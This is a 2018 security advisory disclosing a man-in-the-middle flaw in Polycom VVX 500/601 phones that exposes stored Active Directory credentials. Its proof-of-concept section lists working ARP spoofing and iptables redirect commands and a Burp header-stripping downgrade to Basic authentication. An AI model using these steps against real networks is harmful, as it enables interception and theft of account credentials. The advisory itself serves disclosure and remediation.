Polycom VVX 500 / VVX 601 5.8.0.12848 Man-In-The-Middle

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
Advisory ID: SYSS-2018-027  
Product: VVX 500 / VVX 601  
Manufacturer: Polycom  
Affected Version(s): <= 5.8.0.12848  
Tested Version(s): 5.4.0.10182, 5.8.0.12848  
Vulnerability Type: X.509 validation - Man-in-the-Middle (CWE-300)  
Risk Level: Medium  
Solution Status: Open  
Manufacturer Notification: 2018-08-29  
Solution Date: 20??-??-??  
Public Disclosure: 2018-10-23  
CVE Reference: CVE-2018-18568  
Author of Advisory: Micha Borrmann (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
If a Polycom VVX 500/601 [1] is used with an on-premise installation  
with Skype for Business, the phone has stored credentials of an  
account in the active directory. Performing a man-in-the-middle  
attack, the phone give the credentials to an attacker and therefore  
the account will be compromised.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The phone sends the stored credentials to a website usually named  
autodiscover via HTTPS, but no X.509 certificate validation is used.  
The credentials are sent with the challenge-response NetNTLM  
algorithm. Performing a downgrade attack to HTTP basic authentication,  
the credentials can be harvested Base64 encoded.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
Using Burp Suite as invisible proxy.  
  
Perform an ARP spoofing attack against the phone that the data traffic  
is going the the device were the Burp Suite is running. All attacks  
are started from the same device.  
  
# arpspoof -i eth0 -t 192.168.100.101 192.168.100.1  
  
Set an iptables rule, that the traffic is sent to the Burp Suite, like  
  
# iptables -A PREROUTING -t nat -i eth0 -s 192.168.100.101 -p tcp --dport 443 -j REDIRECT --to-port 8080  
  
Enable rules with the Burp Suite to suppress these two response headers:  
  
WWW-Authenticate: Negotiate  
WWW-Authenticate: NTLM  
  
Now, an authentication downgrade attack is in place, too.  
  
Watch the proxy history for a HTTP POST request like  
  
POST /autodiscover/autodiscover.xml HTTP/1.1  
Content-Type: text/xml; charset=utf-8  
Content-Length: 454  
Connection: close  
Accept-Encoding: gzip, deflate  
Accept-Language: en,*  
User-Agent: Mozilla/5.0  
Host: autodiscover.example.com  
Authorization: Basic ZXhhbXBsZVxBRGFjY291bnRuYW1lOnZlcnl0b3BzZWNyZXRwYXNzd29yZA==  
  
Decode the harvested Base64 encoded credential information.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
Install the new firmware, which has a trust store integrated and a  
strict X.509 certificate validation policy, too.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2018-08-13: Detection of the vulnerability  
2018-08-29: Vulnerability reported to manufacturer  
2018-10-22: CVE number assigned  
2018-10-23: Public release of the security advisory  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
[1] Product web sites for the phones  
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html  
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html  
[2] SySS Security Advisory SYSS-2018-027  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-027.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Micha Borrmann of SySS GmbH.  
  
E-Mail: micha.borrmann (at) syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc  
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory  
may be updated in order to provide as accurate information as  
possible. The latest version of this security advisory is available on  
the SySS Web site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCAAdFiEE8ufGpZlQhO161g3U7b4m5xTqWHYFAlvO5SMACgkQ7b4m5xTq  
WHZlVg/+K4PDs51EB8blqyGt0b2KgEBS6J7vxz2sBUBdxxi0Nh119+5Ybd8fy4QS  
AQfK/5nd3lV88l3IrSnmVdUPdRAEUpMm06X+29kzmGCzC5zJa/OdMZsR9urvaw5z  
JcA/GaIsuMNnnO2WCdBbs5+OiwVb49LO8J6KcV6ALNRe53z7bn9lKc1daUZDW8+L  
WpnNUQRhzgIDeyeAgfoFG0IN6zb7ig9uzxgcwZpqUklhwGsp0UjSLxf7S/WdfqAS  
U2VSyWUTXNK3xWRMdquLqoyp9Rk2Su/xkb7ovnJ/FH54G6sNhN476Qjdp0F8clWj  
dJIV7l7P9GJwbMvzeYLIt23MzOZNGhC0EzwWrd+hB19wMDuelmce/3fzfUcqytkS  
GWxfOsiQGxqDSOKjRMd5WeHT+sh/qqfkaxz5LG0B6aS+2ms9U/vIN0GYip//ulBq  
jtVm21GkvfS6zNBx5Mp8BJwE1CC+9Awlolayg39fbyK0h0fkJBnE7tBBYu9IlnQk  
0QjrQHlGzS8AiZ1SaEsgpz/lZ5iTTTn/PwBm8wGCTPaBfbNCjQPq5a7F2UmrQ+4+  
2SEP5XxLBbv5y0LTzQCxWOgRitGHQkde9q4lsZfWtL/+rW5x4jjIJWK4t5SesGkg  
S2sMN5nJ7a1FAzL+FVyqabDU4Ds31yQa8Vumj1ljSXULYRzfTFI=  
=Ta92  
-----END PGP SIGNATURE-----  
`